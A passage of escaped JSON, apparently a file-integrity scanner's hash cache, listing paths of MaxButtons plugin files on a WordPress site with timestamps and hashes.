1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/integrations\\/gutenberg\\/blocks.style.build.css\":{\"d\":1544493943,\"h\":\"52c87b1df6ed7e34c4680079e4dd67ce\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/integrations\\/gutenberg\\/gutenberg.php\":{\"d\":1544493943,\"h\":\"4352ac565c2fd70f3d93bf9d9759d140\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/integrations\\/gutenberg\\/blocks.build.js\":{\"d\":1544493943,\"h\":\"bde786c87537e7ef86f2a95b3ced266a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/integrations\\/gutenberg\\/blocks.editor.build.css\":{\"d\":1544493943,\"h\":\"ba66890aeb66c8e8620e7231c88396ea\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/scss\\/style.scss\":{\"d\":1544493943,\"h\":\"0c33a6b26d84432c982e3cdc15d62be2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/scss\\/_support.scss\":{\"d\":1544493943,\"h\":\"f58c44b3c092703b814a30744b9fbe5e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/scss\\/_general.scss\":{\"d\":1544493943,\"h\":\"8c50f3131b8b6b941e9df00119a976b4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/scss\\/_gopro.scss\":{\"d\":1544493943,\"h\":\"51998c38fd65413b4ddd824c8122889c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/scss\\/_subtabs.scss\":{\"d\":1544493943,\"h\":\"dadc9ce523bfd46122af4507aaf19d0d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/scss\\/_collection.scss\":{\"d\":1544493943,\"h\":\"05a1fbd449eabedeccb92f51a2067c80\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/scss\\/maxmodal.scss\":{\"d\":1544493943,\"h\":\"f356fd40bad2e4af610c15252cae8db2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/scss\\/_gosocial.scss\":{\"d\":1544493943,\"h\":\"613f9f7ed8b8240ee826fd33103dc5da\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/scss\\/_overview.scss\":{\"d\":1544493943,\"h\":\"3ad3b215690c77af56816ed69dc1b8a4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/scss\\/_elements.scss\":{\"d\":1544493943,\"h\":\"278f32a50170540de83a3f013dec01c1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/scss\\/_input_range.scss\":{\"d\":1544493943,\"h\":\"014c802d664313e93edffe4e362d464d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/scss\\/_mixins.scss\":{\"d\":1544493943,\"h\":\"82440680a10e4ec5ba29f2a41eaceada\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/scss\\/_global.scss\":{\"d\":1544493943,\"h\":\"250e9fd6f35a614f9f6d76cab35c4d71\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/scss\\/review_notice.scss\":{\"d\":1544493943,\"h\":\"9a2f1f6fe29ba831e5455dca9fcc87e8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/scss\\/_feedback.scss\":{\"d\":1544493943,\"h\":\"13601593efd3280b9fecead5f2eb65d8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/scss\\/_settings.scss\":{\"d\":1544493943,\"h\":\"ead39a5c98bf9b1dd165cac226ec55ef\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/scss\\/media_button.scss\":{\"d\":1544493943,\"h\":\"1a4f60f92c68b614117ed0a1cbffea65\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/scss\\/_ads.scss\":{\"d\":1544493943,\"h\":\"f38f63a48c2c6b695ff91d009b0abb91\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/scss\\/_editor.scss\":{\"d\":1544493946,\"h\":\"ec08fd8458413b8a4131410694399065\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/scssphp\\/src\\/Exception\\/RangeException.php\":{\"d\":1544493946,\"h\":\"9ca291b8c5a0caedbc86e23063953924\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/scssphp\\/src\\/Exception\\/ServerException.php\":{\"d\":1544493946,\"h\":\"4e00d8cfb7e3a6dbf05dffaa867e1fe6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/scssphp\\/src\\/Exception\\/ParserException.php\":{\"d\":1544493946,\"h\":\"cc518ee76b91ce09ab392a11f714294c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/scssphp\\/src\\/Exception\\/CompilerException.php\":{\"d\":1544493946,\"h\":\"17fd8bfd2a370441aa4c2e425f59c07b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/scssphp\\/src\\/SourceMap\\/SourceMapGenerator.php\":{\"d\":1544493946,\"h\":\"79af8267fa4ab2bd07ff69997b513cc4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/scssphp\\/src\\/SourceMap\\/Base64VLQEncoder.php\":{\"d\":1544493946,\"h\":\"bc31f9da64b756a829e80083ae3e5a12\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/scssphp\\/src\\/Node\\/Number.php\":{\"d\":1544493946,\"h\":\"195ce552a436bdb291352ef3e4cd4a78\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/scssphp\\/src\\/Formatter\\/OutputBlock.php\":{\"d\":1544493946,\"h\":\"994794d71e821cdf744ecaa4f28ad283\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/scssphp\\/src\\/Formatter\\/Nested.php\":{\"d\":1544493946,\"h\":\"2e98c4fe5275478f6d7aef36debe0740\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/scssphp\\/src\\/Formatter\\/Debug.php\":{\"d\":1544493946,\"h\":\"fbc41ade7b0d5430b56318ee8a131cff\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/scssphp\\/src\\/Formatter\\/Expanded.php\":{\"d\":1544493946,\"h\":\"d09155914135a92c2cfbf1388224f01d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/scssphp\\/src\\/Formatter\\/Compressed.php\":{\"d\":1544493946,\"h\":\"c0584ac9c0f7cc3aae38dcd4eddcbdb4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/scssphp\\/src\\/Formatter\\/Compact.php\":{\"d\":1544493946,\"h\":\"e24f5d6a2bbadcc54335050dffce25d7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/scssphp\\/src\\/Formatter\\/Crunched.php\":{\"d\":1544493946,\"h\":\"6dfd6e721503c103590b363f48c3e694\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/scssphp\\/src\\/Compiler\\/Environment.php\":{\"d\":1544493946,\"h\":\"cb3194f3dd312dd607a7ec0baa8873df\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/scssphp\\/src\\/Base\\/Range.php\":{\"d\":1544493946,\"h\":\"2634b9665da681fb1e50420ea9702c3c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/scssphp\\/src\\/Colors.php\":{\"d\":1544493946,\"h\":\"295c55df99b2191b81c6da7448e9af52\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/scssphp\\/src\\/Compiler.php\":{\"d\":1544493946,\"h\":\"510fd81a176c5480642340ff2ad5666d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/scssphp\\/src\\/Block.php\":{\"d\":1544493946,\"h\":\"e481bdf5879d7b665b7b7f158861b1f7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/scssphp\\/src\\/Version.php\":{\"d\":1544493946,\"h\":\"e35c11cbd305c8e1990b3576a0353dd2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/scssphp\\/src\\/Parser.php\":{\"d\":1544493946,\"h\":\"7e20afe6c0a87375af1588020c4378f0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/scssphp\\/src\\/Formatter.php\":{\"d\":1544493946,\"h\":\"eb5b50468c14f245cc1c6ca6c3d4e7e1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/scssphp\\/src\\/Util.php\":{\"d\":1544493946,\"h\":\"79d482ed14ab6f135546775d96f2a357\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/scssphp\\/src\\/Node.php\":{\"d\":1544493946,\"h\":\"f1b586d8f17cd18ba23038802b25eae3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/scssphp\\/src\\/Type.php\":{\"d\":1544493946,\"h\":\"abfbe75324d42bc7b130a4ec431a624f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/scssphp\\/scss.inc.php\":{\"d\":1544493946,\"h\":\"4afdc3d486ca9526db624f34b87a847f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/scssphp_legacy\\/src\\/Node\\/Number.php\":{\"d\":1544493946,\"h\":\"714f3713046481ece4d384f122ad362d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/scssphp_legacy\\/src\\/Formatter\\/OutputBlock.php\":{\"d\":1544493946,\"h\":\"0077349e7fdcede9907318c73817c658\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/scssphp_legacy\\/src\\/Formatter\\/Nested.php\":{\"d\":1544493946,\"h\":\"28c17c93943e09fb9f2f17428d266c61\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/scssphp_legacy\\/src\\/Formatter\\/Debug.php\":{\"d\":1544493946,\"h\":\"9e44cca6433cf4913496939edcd89624\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/scssphp_legacy\\/src\\/Formatter\\/Expanded.php\":{\"d\":1544493946,\"h\":\"c2a79d51577182999d7de1e8785c556e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/scssphp_legacy\\/src\\/Formatter\\/Compressed.php\":{\"d\":1544493946,\"h\":\"56d318ae1c59be33fb73dca1a57c048a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/scssphp_legacy\\/src\\/Formatter\\/Compact.php\":{\"d\":1544493946,\"h\":\"f7b1761e100de6ad61bab4c5f08c0376\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/scssphp_legacy\\/src\\/Formatter\\/Crunched.php\":{\"d\":1544493946,\"h\":\"edd206c1298cb288e55148b87cb987d1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/scssphp_legacy\\/src\\/Compiler\\/Environment.php\":{\"d\":1544493946,\"h\":\"8e831d01985d89e0b78378b669e78be2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/scssphp_legacy\\/src\\/Base\\/Range.php\":{\"d\":1544493946,\"h\":\"ce1049bac4fdbc4be551b6cb6ee37bef\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/scssphp_legacy\\/src\\/Colors.php\":{\"d\":1544493946,\"h\":\"c09f4a41e4bd7b01ff9bab7a27e14a2a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/scssphp_legacy\\/src\\/Compiler.php\":{\"d\":1544493946,\"h\":\"72ee92f7f4201622bb2353871560e35f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/scssphp_legacy\\/src\\/Block.php\":{\"d\":1544493946,\"h\":\"00bd09d77c7f41f32bc88ca4c75bcd44\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/scssphp_legacy\\/src\\/Version.php\":{\"d\":1544493946,\"h\":\"f87ff4e620147f9aa9b37860daf6ccc5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/scssphp_legacy\\/src\\/Parser.php\":{\"d\":1544493946,\"h\":\"daf0f49cf1b4605c0604c7b858c5972e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/scssphp_legacy\\/src\\/Formatter.php\":{\"d\":1544493946,\"h\":\"3fd2d07fe80b2b7826332f3d96d92b31\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/scssphp_legacy\\/src\\/Util.php\":{\"d\":1544493946,\"h\":\"8d418dd016d21ed1bc8ddcbcd215ef85\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/scssphp_legacy\\/src\\/Server.php\":{\"d\":1544493946,\"h\":\"c7d8cd2d397e66e76f549656052dc3f3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/scssphp_legacy\\/src\\/Node.php\":{\"d\":1544493946,\"h\":\"df166a32c19eb4e6aa72b19291ffb748\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/scssphp_legacy\\/src\\/Type.php\":{\"d\":1544493946,\"h\":\"4ff81b7f621d11116d5c270df09e2b51\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/scssphp_legacy\\/LICENSE.md\":{\"d\":1544493946,\"h\":\"1a7e8e7696d8c69eae800a56d9c9d8eb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/scssphp_legacy\\/README.md\":{\"d\":1544493946,\"h\":\"2d83c85a48e2519096746633bc5e5123\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/scssphp_legacy\\/scss.inc.php\":{\"d\":1544493946,\"h\":\"ca6535efe8a1ffa483c8f0e6a6cb18a1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/font-awesome-5\\/shims.json\":{\"d\":1544493946,\"h\":\"35cd71722e4bef12a8e91451e7a07148\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/font-awesome-5\\/categories.json\":{\"d\":1544493946,\"h\":\"4b44799554a9edcde8956369d809ac54\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/font-awesome-5\\/icons_processed.json\":{\"d\":1544493946,\"h\":\"673052bb503e49315b30221586497fa5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/simple-template\\/simple_template.php\":{\"d\":1544493946,\"h\":\"2839efb73bae99cccbb1d1cb35253900\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/simplehtmldom\\/simple_html_dom.php\":{\"d\":1544493946,\"h\":\"c4f04c5daa48924ff8ea0a9e61adaa30\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/libraries\\/url_slug.php\":{\"d\":1544493946,\"h\":\"de9ba813f6d06b950eed0dcdbd3080b7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/css\\/media_button.css\":{\"d\":1544493946,\"h\":\"7e46511af215076bb9aa95af99d33213\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/css\\/review_notice.css\":{\"d\":1544493946,\"h\":\"2553b316619a69da7ddabf9abad9643d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/css\\/maxmodal.css\":{\"d\":1544493946,\"h\":\"c94ffbb48861178ab83cabb75a40bd9d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/css\\/style.css\":{\"d\":1544493946,\"h\":\"dd02d74a7773d09bd1e83a7e9cc5ac67\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/packs\\/modern-social-share\\/modern-social-share.xml\":{\"d\":1544493946,\"h\":\"1cd9dea02df7d157892e54a8f6c4cc3d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/packs\\/round-white-social-share\\/round-white-social-share.xml\":{\"d\":1544493946,\"h\":\"6bd42a4116a1a1e066c2cc802b7171cf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/packs\\/notched-box-social-share\\/notched-box-social-share.xml\":{\"d\":1544493946,\"h\":\"0a22e2641c70f8680bcd1af148bbf7f9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/packs\\/social-share-squares\\/social-share-squares.xml\":{\"d\":1544493946,\"h\":\"095b879f6a89afd241ff85bc20065af5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/assets\\/packs\\/minimalistic-share-buttons\\/minimalistic-share-buttons.xml\":{\"d\":1544493946,\"h\":\"3a03db51b2d62669f7cb1323a6beb553\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/includes\\/maxbuttons-button.php\":{\"d\":1544493946,\"h\":\"e60924dc45e5aae0cd0003913220fbf5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/includes\\/maxbuttons-controller.php\":{\"d\":1544493946,\"h\":\"ea83855197408311a8c58b66ac2bf83e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/includes\\/maxbuttons-support.php\":{\"d\":1544493946,\"h\":\"169ebb26e0fa68d37d899316b4b19dc9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/includes\\/maxbuttons-list-trash.php\":{\"d\":1544493946,\"h\":\"63df98762336fde38d38e2916b8c0d94\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/includes\\/maxbuttons-pro.php\":{\"d\":1544493946,\"h\":\"d1b74497ad1f52d7c8e22ce9db028843\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/includes\\/maxbuttons-collection-edit.php\":{\"d\":1544493946,\"h\":\"389b53711626e2efa9b67147fb4497af\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/includes\\/admin_header.php\":{\"d\":1544493946,\"h\":\"12bbe1ac9bfb905745154a053455717c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/includes\\/maxbuttons-welcome.php\":{\"d\":1544493946,\"h\":\"1af66d6db850ec8284caea9b77f62993\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/includes\\/maxbuttons-no-simplexml.php\":{\"d\":1544493946,\"h\":\"bdfe46b124ef4d780dc35aa54b08514d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/includes\\/maxbuttons-settings.php\":{\"d\":1544493946,\"h\":\"fa558216b9734c2d7b4e39b31e12c420\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/includes\\/admin_footer.php\":{\"d\":1544493946,\"h\":\"bb6c69a3329cfa4da5c10885e0060b22\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/includes\\/maxbuttons-admin-helper.php\":{\"d\":1544493946,\"h\":\"27dde789c9b001bd6ff49c17c2b49dfe\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/includes\\/social-share.php\":{\"d\":1544493946,\"h\":\"fcdf69b2a258eca1e01f1bc0503f929b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/includes\\/maxbuttons-collection-list.php\":{\"d\":1544493946,\"h\":\"aec5607476019607e01e6e460afd1f48\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/includes\\/maxbuttons-list.php\":{\"d\":1544493946,\"h\":\"ae2c47e107981471a055fab23988e76c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/includes\\/maxbuttons-collections.php\":{\"d\":1544493946,\"h\":\"1de1b39f1218ff92bf275b9e96f11e95\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/pie\\/PIE.htc\":{\"d\":1544493946,\"h\":\"3b8fed93f46e41f2a69bd65c289de89b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/js\\/min\\/tinymce.js\":{\"d\":1544493946,\"h\":\"cd9d4b684928caa31db5ae9a9e2acc3d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/js\\/min\\/review-notice.js\":{\"d\":1544493946,\"h\":\"5e38e1c2147c58d7db9c81d4490e6776\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/js\\/min\\/maxtabs.js\":{\"d\":1544493946,\"h\":\"64dd7ec993fc0ba421a139e316afa401\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/js\\/min\\/maxbuttons-admin.js\":{\"d\":1544493946,\"h\":\"e3455b5cce755a4479ee7f2d3f51254b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/js\\/min\\/maxmodal.js\":{\"d\":1544493946,\"h\":\"76f2d3bc92f37d02b85161af38b40fcb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/js\\/min\\/media_button.js\":{\"d\":1544493946,\"h\":\"941de16d03e7e31bb4953a99a3620874\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/js\\/min\\/maxajax.js\":{\"d\":1544493946,\"h\":\"e9ea9cfe7fbaf15f1734c401d25a1227\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/js\\/min\\/init.js\":{\"d\":1544493946,\"h\":\"9e7f121fa6f0c2620fd35154409fe135\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/js\\/min\\/responsive.js\":{\"d\":1544493946,\"h\":\"23b19170c8fbd1ac6ee1fcef7cdd1b75\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/js\\/tinymce.js\":{\"d\":1544493946,\"h\":\"b0d8a42c27b7299d7bf1d1c619f54907\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/js\\/review-notice.js\":{\"d\":1544493946,\"h\":\"58df4d2f19ada261d7b24a67e598f99a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/js\\/maxtabs.js\":{\"d\":1544493946,\"h\":\"568ad36cef8b2915c77d7bdd2853c45a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/js\\/maxbuttons-admin.js\":{\"d\":1544493946,\"h\":\"617891e9cf201b3194211c940967382e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/js\\/maxmodal.js\":{\"d\":1544493946,\"h\":\"2eca89f0a9017a70b97e575357be4206\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/js\\/media_button.js\":{\"d\":1544493946,\"h\":\"5cd81add0b262d65e9b9ab963ec2d495\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/js\\/maxajax.js\":{\"d\":1544493946,\"h\":\"9962d4332526906b4e47d8fd907d8c0d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/js\\/init.js\":{\"d\":1544493946,\"h\":\"2dfce196984a6826be97db2d3b05f127\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/maxbuttons\\/js\\/responsive.js\":{\"d\":1544493946,\"h\":\"439b2ab8390cfd8fdab3e7a51ea9eccf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-